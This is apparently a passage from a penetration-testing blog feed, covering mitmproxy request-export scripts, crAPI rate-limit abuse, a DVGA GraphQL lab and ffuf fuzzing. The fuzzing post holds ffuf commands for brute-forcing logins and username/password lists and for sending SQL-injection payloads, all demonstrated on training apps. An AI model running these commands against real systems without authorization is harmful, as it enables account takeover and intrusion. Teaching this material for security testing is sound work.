                filename = f&quot;{f.request.host}-{f.request.method}-{int(f.request.timestamp_start)}.txt&quot;
                filepath = os.path.join(dir, filename)
                raw_request = self.format_request(f)
                with open(filepath, &quot;w&quot;) as file:
                    file.write(raw_request)
                ctx.log.info(f&quot;Exported request: {filepath}&quot;)

addons = [
    Exporter()
]


```

To deploy this script, simply append it to mitmproxy with the `-s` flag, like so:

```bash
mitmproxy -s requests_dumper.py

```

Or, integrate it into your configuration file for a seamless experience.

## Practical Magic with Commands

Imagine you’re dissecting a login sequence and wish to archive its requests for further analysis or fuzzing. Mark the relevant requests and unleash your custom command to funnel them into the &quot;requests&quot; directory, ready for any operation you plan next.

![](/content/images/2024/03/image-39.png)

Login requests

![](/content/images/2024/03/image-40.png)

Marked requests

![](/content/images/2024/03/image-41.png)

Using the command to export requests

![](/content/images/2024/03/image-42.png)

Result of raw requests

## A Twist with mitmdump

Mitmdump, mitmproxy’s CLI sibling, offers a parallel path. It stands guard, diligently archiving every request from your browsing session into the &quot;raw\_requests&quot; directory.

```python
from mitmproxy import http
import os

EXPORT_DIR = &quot;raw_requests&quot;

def ensure_dir_exists(directory):
    if not os.path.exists(directory):
        os.makedirs(directory)

def request(flow: http.HTTPFlow):
    ensure_dir_exists(EXPORT_DIR)
    
    # Build a filename from the request details
    filename = f&quot;{flow.request.host}-{flow.request.method}-{int(flow.request.timestamp_start)}.txt&quot;
    filepath = os.path.join(EXPORT_DIR, filename)
    
    # Format the request in the specified raw format
    request_line = f&quot;{flow.request.method} {flow.request.pretty_url} {flow.request.http_version}&quot;
    headers = &apos;\n&apos;.join(f&quot;{name}: {value}&quot; for name, value in flow.request.headers.items())
    body = flow.request.get_text(strict=False)
    
    raw_request = f&quot;{request_line}\n{headers}\n\n{body}&quot;
    
    # Save the formatted request to the file
    with open(filepath, &quot;w&quot;) as file:
        file.write(raw_request)

```

Activate it with a `-s` flag:

```bash
mitmdump -s ~/Tools/mitmproxy/raw_dumper.py

```

This is but a peek into the realm of plugins and scripts with mitmproxy. Imagine coupling this with tools like ffuf or katana, orchestrating a symphony of tests from the comfort of your proxy. The possibilities? Limitless.

# Conclusion: Charting the Course Forward

As we dock back into the harbor after our voyage across the complex seas of web penetration testing, it&apos;s time to reflect on the journey we&apos;ve undertaken together. Through the mists of technical challenges and the storms of cybersecurity threats, proxies have been our steadfast allies, illuminating the path to understanding and securing web applications.

## The Power of Proxies Unleashed

Our exploration revealed the critical role proxies like mitmproxy play in the arsenal of a web penetration tester. By serving as the lens through which we can inspect, intercept, and manipulate web traffic, proxies empower us to uncover vulnerabilities that could otherwise lay hidden beneath the surface. They are not just tools but extensions of our will to protect and secure the digital domain.

## Mastery Through Practice

The hands-on examples, from setting up our environment to delving into the inner workings of applications like Juice Shop, demonstrated the practical application of proxies in real-world scenarios. These exercises underscored a fundamental truth: mastery in web penetration testing comes through practice, experimentation, and a relentless pursuit of knowledge.

## In Closing

Our voyage through the realm of proxies and web penetration testing may have reached its conclusion, but the adventure of learning and exploration never truly ends. Armed with the knowledge and skills you&apos;ve acquired, you are now a beacon of security in the digital age, a protector of the vast web applications that power our world.

Remember, the sea of cybersecurity is wide and deep, filled with both peril and promise. It&apos;s up to us, the navigators of this digital world, to chart a course toward a safer future. So, keep your compass true, your maps updated, and your curiosity alive. The next horizon is yours to explore.</content:encoded><author>Ruben Santos</author></item><item><title>API Safeguards: Mastering Rate Limiting and GraphQL Security</title><link>https://www.kayssel.com/post/hacking-apis-6</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-apis-6</guid><description>Exploring API security, this chapter covers rate limiting in REST APIs and dives into GraphQL vulnerabilities. It includes setting up a &quot;Damn Vulnerable GraphQL Application&quot; lab, testing with Altair, and emphasizes the importance of robust security measures in API design and testing.</description><pubDate>Sun, 17 Mar 2024 16:34:08 GMT</pubDate><content:encoded># Introduction

Welcome to a comprehensive journey through the intricacies of API security, focusing on rate limiting and GraphQL. In the digital realm, the balance between accessibility and security is paramount. This chapter embarks on an exploration of rate limiting within REST APIs—a critical mechanism for managing resource access and preventing abuse. As we progress, we pivot towards the dynamic world of GraphQL, uncovering its unique vulnerabilities and strengths. Through practical examples and hands-on exercises, including the setup of a &quot;Damn Vulnerable GraphQL Application&quot; lab and testing with the Altair client, we aim to deepen your understanding of these technologies. Our journey is designed to arm you with the knowledge and skills necessary to navigate the challenges of API security, ensuring you&apos;re well-equipped to protect your digital assets in an ever-evolving landscape.

### Main Content Highlights

-   **Rate Limiting in REST APIs**: We delve into the necessity of rate limiting as a safeguard against overuse and abuse, ensuring APIs remain efficient and secure.
-   **Proof of Concept with crAPI**: A real-world example illustrates the consequences of inadequate rate limiting, highlighting the potential for denial of service attacks.
-   **Bridging REST and GraphQL**: Transitioning from REST API vulnerabilities to the exploration of GraphQL, we set the stage for a deeper dive into this flexible query language.
-   **Deep Dive into GraphQL**: An overview of GraphQL&apos;s main components—queries, mutations, subscriptions, schema, and resolvers—lays the groundwork for understanding its operational dynamics.
-   **Creating a Laboratory**: Setting up a hands-on lab with &quot;Damn Vulnerable GraphQL Application&quot; provides a practical context for vulnerability exploration.
-   **Choosing a GraphQL Client**: The selection of Altair as a feature-rich client emphasizes the importance of effective tools in vulnerability testing.
-   **Testing the GraphQL Client**: Demonstrating the testing process with graphw00f and introspection queries, we validate the functionality of our GraphQL setup.

# **Understanding Rate Limiting**

In the digital world, as we strive to create applications that are not only efficient but also secure, understanding the concept of rate limiting becomes crucial, especially when dealing with REST APIs. Rate limiting is a protective measure that API developers implement to control the amount of incoming requests a user can make within a specified timeframe. This mechanism serves as a gatekeeper, ensuring that the API&apos;s resources are used in a fair and efficient manner, preventing overuse and potential abuse.

Why is rate limiting so important? Imagine a scenario where an API is left unchecked, open to an unlimited number of requests. This could lead to a variety of issues, including server overload, degraded service performance for other users, and an increased vulnerability to DDoS attacks, where malicious actors attempt to bring down a service by flooding it with high volumes of traffic.

By implementing rate limiting, API providers can specify thresholds, such as a certain number of requests per minute or hour for each user. If these thresholds are exceeded, the API can temporarily block further requests from the offending user, thereby mitigating the risk of overuse and ensuring a more stable and reliable service for all users.

In essence, rate limiting acts as a critical safeguard in the REST API ecosystem, balancing the need for open access with the imperative of maintaining service integrity and security. It&apos;s a testament to the thoughtful design and management of digital resources in an ever-connected world.

## **Real-World Example: Rate Limiting Gone Wrong in crAPI**

Now that we understand what rate limiting is, let&apos;s dive into a real-world example that showcases a flawed implementation of this concept in an API. Our focus will be on the crAPI, particularly a feature we haven&apos;t explored yet: contacting a mechanic through the application dashboard.

![](/content/images/2024/03/image-21.png)

Mechanic contact section

In this section of crAPI, users are prompted to fill in details such as the mechanic&apos;s information and a description of their issue. This process seems straightforward, but when we examine the backend request using tools like Burp Suite, we uncover something intriguing.

![](/content/images/2024/03/image-22.png)

Form to write to the mechanic

![](/content/images/2024/03/image-23.png)

Successful registration

Among the parameters, two catch our eye: `repeat_request_if_failed`, which defaults to `False`, and `number_of_repeats`. The names suggest these parameters control the repetition of requests, potentially without limits. By toggling `repeat_request_if_failed` to `True` and setting a high `number_of_repeats`, we inadvertently trigger a denial of service (DoS) by overwhelming the system with repeated requests, thereby highlighting a critical absence of rate limiting.

![](/content/images/2024/03/image-24.png)

Form requests

![](/content/images/2024/03/image-25.png)

Change form values

In the vast landscape of the real world, such vulnerabilities may not always be blatantly apparent. Often, the problematic parameter might be buried among countless others, making it a needle in a digital haystack. Yet, the lesson here is clear: if you ever suspect an application could be susceptible to such misuse, it&apos;s imperative to report it. Conducting denial of service tests without caution can lead to severe financial repercussions for the client. This scenario underlines the importance of implementing robust rate limiting to safeguard against unintended service disruptions, ensuring the API remains resilient under various conditions.

# **Bridging Our Discussion from REST API Rate Limiting to GraphQL**

In the previous section, we delved into the crucial concept of rate limiting within REST APIs—an essential safeguard against overuse and abuse, ensuring the APIs remain efficient and secure. This exploration not only highlighted the importance of managing access to our digital resources but also set the stage for our next venture into the realm of GraphQL.

# **A Comprehensive Overview of GraphQL**

In today’s episode, we delve deeper into the world of GraphQL, a powerful query language for APIs, and a runtime for executing those queries by using a type system you define for your data. Unlike traditional REST APIs, which can be limited by rate limiting strategies as discussed, GraphQL offers a more flexible and efficient approach to data retrieval and manipulation. It isn&apos;t tied to any specific database or storage engine and is instead backed by your existing code and data.

GraphQL revolutionizes client-server interactions by allowing clients to request exactly what they need, thus avoiding the over-fetching and under-fetching issues commonly associated with REST APIs. This makes GraphQL an efficient alternative, designed to make APIs faster, more adaptable, and more developer-friendly.

The main components of GraphQL include:

1.  **Queries**: The request made to a GraphQL server. Unlike REST, where you would use different endpoints to get various data, with GraphQL, you use a single endpoint but specify what you want in the query.
2.  **Mutations**: These are how you modify data in the system. Think of them as the POST, PUT, DELETE methods in a REST API, but again, with more specificity and control over what is returned after the operation.
3.  **Subscriptions**: A powerful feature that allows clients to subscribe to real-time updates from the server.
4.  **Schema**: The heart of any GraphQL setup, defining what queries, mutations, and subscriptions can be made, what types of objects are returned, and how they are interconnected.
5.  **Resolvers**: The functions that are responsible for fetching the data for each field in the schema.

In [Chapter 1](https://www.kayssel.com/post/api-hacking-1/), we laid the groundwork by covering the basics of GraphQL and how to perform reconnaissance on this type of architecture in a web penetration testing scenario. We also discussed the primary tools utilized in the process, providing you with a solid foundation to start exploring GraphQL vulnerabilities.

Moving forward, our focus will shift more towards identifying and exploiting vulnerabilities specific to GraphQL APIs. We’ll cover common security pitfalls, how to mitigate them, and advanced techniques to ensure your or your client&apos;s APIs are secure. Stay tuned for an in-depth exploration of these critical aspects in our upcoming chapters.

# **Setting Up the Laboratory: Damn Vulnerable GraphQL Application**

As part of our journey to master GraphQL, and continuing the practice we&apos;ve established throughout this series, we&apos;re going to set up a hands-on lab environment. For this purpose, we&apos;ll be utilizing an application known as &quot;Damn Vulnerable GraphQL Application,&quot; or DVGA for short. To get our lab up and running, we&apos;ll leverage Docker for installation:

```bash
git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git &amp;&amp; cd Damn-Vulnerable-GraphQL-Application

docker build -t dvga .

docker run -d -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga

```

After installation, you&apos;ll be able to access the application&apos;s interface seamlessly.

![](/content/images/2024/03/image-20.png)

DVGA

With that, our lab is all set for practice. Similar to our approach with REST APIs, here we&apos;ll focus specifically on GraphQL vulnerabilities. However, we won&apos;t cover traditional web hacking vulnerabilities like SQL injection or command injection, to name a few.

# **Selecting a GraphQL Client: The Case for Altair**

When diving into the exploration of GraphQL vulnerabilities, having a powerful and user-friendly client can significantly enhance the learning and testing process. Among the plethora of GraphQL clients available, we&apos;ve chosen to focus on Altair, renowned for its comprehensive feature set and widespread use within the community.

Altair stands out as a visually appealing and feature-rich GraphQL client, designed to cater to a wide array of platforms. Its intuitive interface and robust functionality make it an ideal choice for both beginners and experienced users alike, facilitating the exploration of GraphQL queries, mutations, and subscriptions with ease.

To get started with Altair, I highly recommend visiting the official GitHub page for the most direct installation process:

[GitHub - altair-graphql/altair: ✨⚡️ A beautiful feature-rich GraphQL Client for all platforms.](https://github.com/altair-graphql/altair)

Although I typically prefer using terminal-based tools for their simplicity and efficiency, I must admit that, in the realm of GraphQL clients, none have fully met my expectations so far. However, this is a personal preference, and the landscape is vast and ever-evolving. Should you come across a terminal-based GraphQL client that captures your interest, I&apos;m all ears! Meanwhile, rest assured that such tools do exist, and a bit of exploration on GitHub might uncover a hidden gem perfectly suited to your preferences. Whether you&apos;re a fan of GUI or command-line interfaces, the key is to find a tool that complements your workflow and enhances your exploration of GraphQL vulnerabilities.

## **Hands-On Testing: Unveiling GraphQL with Altair**

To begin testing our GraphQL client, our first step is to identify and load the GraphQL endpoint. For this purpose, we often turn to tools like [`graphw00f`](https://www.kayssel.com/post/api-hacking-1/#detecting-graphql-the-tools-of-the-trade), which are designed to detect GraphQL APIs efficiently. Once we&apos;ve pinpointed the endpoint, we&apos;ll proceed by inputting it into the designated query section of our client.

Upon executing a preliminary query, you might notice that it doesn&apos;t produce any immediate results. This isn&apos;t a cause for concern. At this juncture, a smart move is to perform an introspection query. This special type of query allows us to peek under the hood of the GraphQL API, providing insights into its schema and the types of operations it supports.

![](/content/images/2024/03/image-27.png)

Request to GraphQL endpoint

As illustrated in the image below, the successful return of detailed schema information through an [introspection query](https://www.kayssel.com/post/api-hacking-1/#introspection-query-unveiling-the-depths-of-graphql) confirms that our client is in good working order. This not only reassures us of the client&apos;s functionality but also equips us with valuable knowledge about the API&apos;s structure, paving the way for more effective and informed testing or development going forward.

![](/content/images/2024/03/image-26.png)

Request with introspection

# Conclusions

Throughout this chapter, we&apos;ve navigated the critical aspects of API security from rate limiting in REST APIs to the vulnerabilities and testing methodologies of GraphQL. The journey from understanding the basic protections against API abuse to hands-on testing with GraphQL underscores the complexity and importance of robust security measures. The practical setup of a vulnerable GraphQL environment and the exploration with Altair have equipped you with a hands-on understanding of how to identify and exploit common vulnerabilities.

As we conclude, remember that the landscape of API security is continuously evolving. The principles and practices discussed here lay a foundation for vigilance and ongoing education in protecting APIs against emerging threats. Whether you&apos;re developing new applications or securing existing ones, the insights from this chapter are crucial for anyone looking to enhance their security posture in the digital age. Armed with this knowledge, you&apos;re better prepared to face the challenges of API security, ensuring the integrity and reliability of your digital services in an interconnected world.

# Resources

[GitHub - dolevf/Damn-Vulnerable-GraphQL-Application: Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook’s GraphQL technology, to learn and practice GraphQL Security.](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)</content:encoded><author>Ruben Santos</author></item><item><title>The Art of Fuzzing: Navigating Web Security with Advanced Testing Strategies</title><link>https://www.kayssel.com/post/hacking-web-3</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-3</guid><description>Explore fuzzing in web pen testing, from uncovering directories to attacking login portals and finding vulnerabilities, utilizing tools like ffuf.</description><pubDate>Sun, 10 Mar 2024 12:25:22 GMT</pubDate><content:encoded># Introduction

In the dynamic landscape of web security, penetration testers are constantly seeking innovative approaches to uncover vulnerabilities that could be exploited by malicious actors. Fuzzing emerges as a critical technique in this endeavor, offering a systematic method to test the resilience of web applications against unexpected or malformed inputs. This chapter delves into the art and science of fuzzing, exploring its application in discovering directories, attacking login portals, and identifying potential vulnerabilities. By leveraging tools such as ffuf, Dirbuster, and Wfuzz, testers can simulate a wide range of attack scenarios, uncovering flaws that would otherwise remain hidden. As we navigate through these sections, we&apos;ll provide insights into effective fuzzing strategies, illustrating how they can be employed to enhance the security posture of web applications. The journey through fuzzing is not just about finding weaknesses; it&apos;s about fortifying defenses, ensuring that applications can withstand the myriad threats that pervade the digital world.

# **Expanding Your Web Penetration Testing Methodology**

In this chapter, we&apos;ll refine your penetration testing methodology by integrating three essential techniques:

1.  **Directory Fuzzing:** Uncover hidden paths to sensitive data accessible without page authentication. This technique often reveals overlooked resources, such as .git repositories, that could pose significant security risks.
2.  **Login Portal Fuzzing:** Assess the security of authentication mechanisms within login portals. By systematically testing these gateways, we can determine their resilience against unauthorized access attempts.
3.  **Parameter Fuzzing:** Identify vulnerabilities within application parameters. This approach lays the groundwork for advanced automated testing methods we&apos;ll explore in upcoming discussions.

# Understanding Fuzzing in Web Penetration Testing

Fuzzing stands as a pivotal technique within web penetration testing, aimed at identifying security vulnerabilities, detecting anomalous behaviors, or eliciting unexpected responses from applications. This method entails bombarding an application with a vast array of random data (&quot;fuzz&quot;) to trigger errors, crashes, or reveal security loopholes. Such a strategy is instrumental in highlighting potential frailties across various application components, including input fields, APIs, and backend mechanisms, which could be susceptible to exploitation by malicious entities.

The automation of vulnerability discovery through fuzzing offers a significant advantage in web penetration testing, streamlining the process to efficiently uncover issues like buffer overflows, injection vulnerabilities, and improper input handling.

A suite of specialized tools facilitates fuzzing efforts in web penetration contexts, distinguished by their respective focuses and capabilities:

-   [**ffuf (Fuzz Faster U Fool):**](https://github.com/ffuf/ffuf) A go-to web fuzzer for its rapid performance in unearthing web application elements and content, primarily utilized for directory and file discovery yet adaptable for a wide array of fuzzing tasks.
-   [**Dirbuster:**](https://www.kali.org/tools/dirbuster/) A Java-based utility favored for its proficiency in identifying hidden files and directories on a web server, leveraging a list-based approach to systematically explore web application structures.
-   [**Wfuzz**](https://github.com/xmendez/wfuzz)**:** Offers a comprehensive fuzzing solution tailored for web applications, supporting a myriad of scenarios from directory discovery to session hijacking and parameter fuzzing. Its extensive feature set and modular architecture make it adaptable to a wide variety of testing requirements.

In this chapter, we will explore the primary applications of fuzzing, with a special emphasis on using ffuf for our demonstrations. Its ability to adapt to various fuzzing scenarios makes **ffuf** an excellent choice for those looking to comprehensively test the security of web applications.

# **Directory Discovery Through Fuzzing**

Fuzzing techniques serve various purposes in an audit, with one common application being the discovery of accessible directories within an application. To achieve this, a basic command using ffuf might look like this:

```bash
ffuf -u &lt;url&gt;/FUZZ -w &lt;wordlist&gt;

```

![](/content/images/2024/03/image-1.png)

Fuzzing directories with ffuf

It&apos;s crucial to place the keyword &quot;FUZZ&quot; at the position where each wordlist entry should be injected. At this stage, the sheer volume of results can be overwhelming, making it hard to discern the relevant findings. This is where filters come into play. ffuf provides an array of filters, from response status codes to regular expressions, as well as &quot;matchers.&quot; While filters exclude unwanted results, matchers pinpoint exactly what we&apos;re searching for: for instance, to find a specific word in the response, you could use `-mr &quot;word&quot;`. Experimenting with both will help you identify the most effective combination for your needs.

![](/content/images/2024/03/image-2.png)

Filter options and matchers

In my experience, employing a response size filter (-fs) has been effective in refining the results, making the potential directories more apparent, as illustrated below. The next step involves examining these directories individually and continuing the fuzzing process to uncover potentially interesting findings that shouldn&apos;t be accessible at first glance.

![](/content/images/2024/03/image.png)

Filtering by request size

The image demonstrates the use of a dirbuster list, a common choice in CTF (Capture The Flag) scenarios due to its reliability in yielding fruitful outcomes. However, in real-world applications, selecting a wordlist tailored to the technology employed by the application can lead to significantly better results. Numerous wordlists are available in GitHub repositories, but I&apos;d like to highlight two in particular that have proven exceptionally useful in my offensive security endeavors. First among these is the Assetnote lists:

[Assetnote Wordlists](https://wordlists.assetnote.io/)

The second noteworthy resource originates from the creator of reconftw, a tool designed for automating penetration testing in web applications. The wordlists available in this repository are exceptionally valuable due to their broad applicability, often delivering impressive results:

[GitHub - six2dez/OneListForAll: Rockyou for web fuzzing](https://github.com/six2dez/OneListForAll)

Leveraging the Dirbuster list, Assetnote&apos;s technology-specific lists, and the OneListForAll from the creator of reconftw equips you with a comprehensive toolkit for web application security testing. These curated resources significantly enhance the effectiveness of your fuzzing efforts, allowing for more precise and targeted audits.

# **Attacking Login Portals with Fuzzing Techniques**

Fuzzing is not only useful for discovering directories but also plays a crucial role in authentication testing, particularly with password recovery and login portals. For those who use Burp Suite but do not have access to its Pro version, fuzzing can offer a faster alternative for conducting these tests.

The process begins by obtaining the request in raw format, which can be captured using a proxy tool like mitmproxy, ZAP, or Burp Suite. Capturing this request is a preliminary step towards preparing for fuzzing, which involves replacing the &quot;password&quot; parameter with the placeholder &quot;FUZZ&quot;.

![](/content/images/2024/03/image-3.png)

Capturing request with mitmproxy

![](/content/images/2024/03/image-12.png)

Request in raw format in text file

For a penetration test, the goal often includes verifying the application&apos;s resilience against brute force attacks. To this end, a concise list—say, of 11 words—may suffice, ensuring that the actual password is included to demonstrate the application&apos;s vulnerability when it fails to block the attack.

![](/content/images/2024/03/image-5.png)

List of words to test brute force attacks

To conduct a brute force attack on login portals, the following command is used, emphasizing the importance of specifying a proxy to log the requests made to the application:

```bash
ffuf -request fuzzing_login.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w passwords.txt | tee results.txt

```

This command utilizes a prepared text file (e.g., `fuzzing_login.txt`) containing the captured request, with &quot;FUZZ&quot; placed in the password field. The `-w` flag specifies the wordlist for passwords, while the `-replay-proxy` option logs the requests. A successful attack is indicated by server responses that confirm the absence of user blocking or other brute force prevention mechanisms, showcasing the application&apos;s vulnerability.

![](/content/images/2024/03/image-8.png)

Successful brute force attack

![](/content/images/2024/03/image-11.png)

Attempt made with many more words to verify vulnerability

If we now go to our proxy, we can investigate the successful request and see how the response returns the JWT to start interacting with the web application.

![](/content/images/2024/03/image-9.png)

Vulnerable request

![](/content/images/2024/03/image-10.png)

Vulnerable response

In scenarios where brute-force mechanisms are effectively countered, the response from a web application to a successful password guess would be indistinguishable from that of a failed attempt. This uniform response pattern could signal the presence of anti-brute-force measures, such as user account lockouts after several incorrect attempts or the implementation of a second authentication factor. Such measures would make it challenging to determine whether the correct password has been identified, serving as an indicator of the application&apos;s robust defense against brute-force attacks.

On the other hand, the same methodology can be adapted for various purposes, such as user registration, ID verification to uncover authorization issues, and more. If the application is found to be vulnerable to brute force attacks, extending the attack to include usernames can be beneficial. The following resource offers wordlists for creating statistically likely usernames, which can be customized to include domain-specific details for a more effective attack:

[GitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testing](https://github.com/insidetrust/statistically-likely-usernames)

This command appends &quot;@gmail.com&quot; to each entry in a username list, enhancing the list&apos;s relevance for targeted attacks.

```bash
sed -i &apos;s/$/@gmail.com/&apos; john.txt

```

For comprehensive brute force attacks involving both usernames and passwords, the command below can be employed, with the `-w` flag used twice to specify separate wordlists for passwords and usernames:

```bash
ffuf -request fuzzing_login.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w passwords.txt:PASS -w users.txt:USER | tee results.txt

```

![](/content/images/2024/03/image-15.png)

Specify list to be used in each parameter

Successful attempts are typically indicated by an HTTP 200 status code in the file where ffuf stored its results, revealing the effectiveness of the brute force strategy. This approach underscores the importance of selecting appropriate wordlists and fine-tuning fuzzing parameters to effectively expose security vulnerabilities within web applications.

![](/content/images/2024/03/image-13.png)

Use of grep to find the searched combination

![](/content/images/2024/03/image-14.png)

Differentiating the successful result

Alternatively, ffuf&apos;s own match and filter options (for example, `-mc` to match on status codes) can surface successful results directly in the output, streamlining the process of pinpointing a working combination.

![](/content/images/2024/03/image-16.png)

Brute-Force attack, combining user and password list with filter

# **Vulnerability Discovery via Fuzzing**

The versatility of fuzzing tools like ffuf extends to uncovering anomalous behavior or vulnerabilities within application parameters. A practical application of this is to assess potential SQL injection vulnerabilities, as demonstrated in the Juice Shop login portal scenario. A critical component of this process is utilizing a well-constructed list of SQL injection payloads; for such purposes, the payloadbox list linked below comes highly recommended:

[sql-injection-payload-list/Intruder/detect/Generic\_ErrorBased.txt at master · payloadbox/sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/detect/Generic_ErrorBased.txt)

The procedure begins with capturing a raw request through a proxy and inserting the keyword &quot;FUZZ&quot; into a designated parameter to signal it as the target for fuzzing.

![](/content/images/2024/03/image-17.png)

Request in raw format

The final step involves running the tool alongside our proxy to intercept and log all outgoing requests, enabling a detailed examination of the responses:

```bash
# -od stores each matched request/response pair in the given directory
ffuf -request sqli_fuzzing.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w sqli -od sqli_fuzzing_results

```

With specific payloads, a status 500 error may surface. Delving into the responses of these requests can reveal SQL errors along with the queries executed by the application, thereby confirming the presence of a SQL injection vulnerability.

![](/content/images/2024/03/image-18.png)

Mitmproxy request history

![](/content/images/2024/03/image-19.png)

Response showing vulnerable behavior

This technique can be applied to various requests for comprehensive vulnerability assessment. In forthcoming chapters, we&apos;ll explore tools specifically designed to identify vulnerabilities, showcasing how fuzzing is leveraged behind the scenes to detect them effectively.

# Conclusion

As we conclude this exploration of fuzzing within web penetration testing, it&apos;s clear that this technique is invaluable for security professionals. Through the strategic application of fuzzing, we&apos;ve seen how it&apos;s possible to unearth directories, breach login portals, and discover vulnerabilities that could compromise an application&apos;s integrity. Tools like Ffuf have proven to be indispensable allies in this quest, enabling testers to conduct comprehensive and effective security assessments. However, the journey doesn&apos;t end here. The ever-evolving nature of web technologies and threat landscapes demands continuous learning and adaptation. As you apply the knowledge and strategies discussed in this chapter, remember that the ultimate goal is to stay one step ahead of potential threats, safeguarding your applications against the unforeseen challenges of tomorrow. Fuzzing, with its capacity to simulate a wide array of attack vectors, remains a critical component of any robust security testing toolkit, ensuring that the digital fortresses we build can withstand the onslaughts they face.

# Resources

[Everything you need to know about FFUF](https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html)</content:encoded><author>Ruben Santos</author></item><item><title>Katana in Action: Enhancing Security Audits Through Effective Web Crawling</title><link>https://www.kayssel.com/post/hacking-web-2</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-2</guid><description>Explore advanced crawling techniques for web security audits, focusing on tools like Katana and proxies to uncover hidden vulnerabilities and secure web applications effectively.</description><pubDate>Sun, 03 Mar 2024 12:32:04 GMT</pubDate><content:encoded># Introduction

Welcome to a vital chapter in our series on enhancing web application security through advanced crawling techniques. This installment is dedicated to empowering auditors with the knowledge and tools necessary to uncover the hidden depths of web applications. By leveraging the powerful capabilities of Katana and exploring strategic methodologies, readers will gain insights into navigating the complex landscape of software vulnerabilities, TLS/SSL configurations, security headers, and application crawling. This chapter not only outlines the initial steps typically undertaken in security audits but also introduces advanced options for a more thorough examination, promising a significant advantage in the quest for comprehensive security assessments.

# Methodology Overview

As we navigate through the various chapters of this series, I&apos;ll highlight a structured series of checks to incorporate into your audits. This approach is designed to streamline your testing process and ensure comprehensive coverage of critical security areas. For today&apos;s installment, I recommend focusing on the following key areas:

1.  **Look at Vulnerabilities in Used Software**: It&apos;s essential to start by identifying and assessing the software your application relies on. This includes libraries, frameworks, and any third-party tools. Understanding the vulnerabilities in these components can provide early insights into potential security risks.
2.  **Check TLS/SSL Settings**: The configuration of TLS/SSL protocols plays a critical role in securing data in transit. Evaluating these settings ensures that your application is using strong encryption standards and is protected against eavesdropping and man-in-the-middle attacks.
3.  **Configuration of Security Headers**: Security headers are a fundamental aspect of web application security. They instruct browsers on how to handle your content safely, preventing a range of attacks. Ensuring these are correctly configured adds another layer of security.
4.  **Application Crawling**: Lastly, a thorough crawl of your application is indispensable. It helps map out the application&apos;s structure, revealing the full scope of what needs to be tested. This includes identifying hidden endpoints and resources that could be potential targets for attackers.

# Essential Firefox Setup

To kick things off, we&apos;re going to set up Firefox for performing audits. You&apos;re welcome to use a Chromium-based browser instead, but it&apos;s worth noting that one of the plugins we&apos;ll be discussing isn&apos;t available for those browsers just yet.

First up, and most importantly, is [FoxyProxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search). This plugin is crucial for configuring the proxies we&apos;ll be utilizing. We&apos;ll dive deeper into its functionality and how it operates in upcoming chapters.

Next on the list is [Firefox Containers.](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search) This handy plugin makes conducting various authentication and authorization tests a breeze. Essentially, it lets you keep multiple tabs open, each with cookies from different users, facilitating privilege and access control testing. If you&apos;re curious to see it in action, [I&apos;ve used it in an article which you might find insightful](https://www.kayssel.com/post/bola-and-bfla/).

Last but not least, we have [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search). This tool is invaluable for quickly identifying the software versions a website is running. While it might not be the star of the show during this series, in real-life scenarios, pinpointing software with known vulnerabilities is absolutely critical.

![](/content/images/2024/02/image-28.png)

Required plugins

Installing these plugins is a straightforward process, similar to adding any other plugin to Firefox. Just search for them in the Firefox Add-ons Store and click install. It&apos;s as simple as that!

![](/content/images/2024/02/image-36.png)

Search in the Firefox store

![](/content/images/2024/02/image-37.png)

Add a plugin

# Technological Reconnaissance

The first thing we will do is take a look at the software in use. The main takeaway is that the application runs Angular, jQuery, and core-js. This will condition certain processes that are usually performed during an audit, as we will see throughout the series as well as in this chapter. In a conventional pentest, we would also look up each software version and check whether it contains public vulnerabilities.

![](/content/images/2024/02/image-38.png)

Technologies detected with Wappalyzer

In this case, as we can see, jQuery and core-js ship with known vulnerabilities, while Angular does not. We will have to report this to the client as a finding. It should be noted that we do not need to exploit it as such; simply indicating it as detected in the report is enough (to find the details, just search for the software name and its corresponding version).

![](/content/images/2024/02/image-39.png)

Angular without vulnerabilities

![](/content/images/2024/02/image-40.png)

Jquery with vulnerabilities

![](/content/images/2024/02/image-41.png)

Core-js with vulnerabilities

# Core Security Checks

In addition to the challenge of keeping software libraries up to date, two critical aspects are commonly scrutinized during web application audits:

1.  **TLS/SSL Certificates:** It&apos;s essential to ensure that the security protocols safeguarding data transmission are robust and functioning correctly. For this purpose, we often turn to a tool called [testssl](https://github.com/drwetter/testssl.sh). This utility automates the evaluation process, meticulously checking the application&apos;s adherence to these security protocols. By using `testssl`, we aim to provide our clients with peace of mind, confirming that their data encryption standards meet current security benchmarks.
2.  **Security Headers:** Another key area of focus is the configuration of security headers within the web application. These headers, such as `Strict-Transport-Security`, `Content-Security-Policy`, and others, play a pivotal role in fortifying the application against various vulnerabilities. They work by instructing the browser on how to behave when handling the site&apos;s content, significantly reducing the risk of security breaches. To assess the effectiveness of these security measures, we utilize a tool called [shcheck](https://github.com/santoru/shcheck). This tool scans the application&apos;s headers, providing a clear overview of its security posture and highlighting areas for improvement.

# The art of Application Crawling

After completing the initial checks, it&apos;s highly beneficial to perform a web crawl to discover the various types of links present on the webpage. This preliminary exploration is crucial as it lays the groundwork for further automating scanning processes or conducting vulnerability scans. By identifying the links and resources associated with the web application early on, we can streamline our approach to security assessments.

Crawling the web application serves as an initial survey, providing us with valuable insights into its structure and content. This step is crucial for mapping out the application&apos;s landscape, which, in turn, enables us to tailor our security testing strategies more effectively. The insights gained from this process help in automating subsequent scans, ensuring a thorough and efficient assessment.

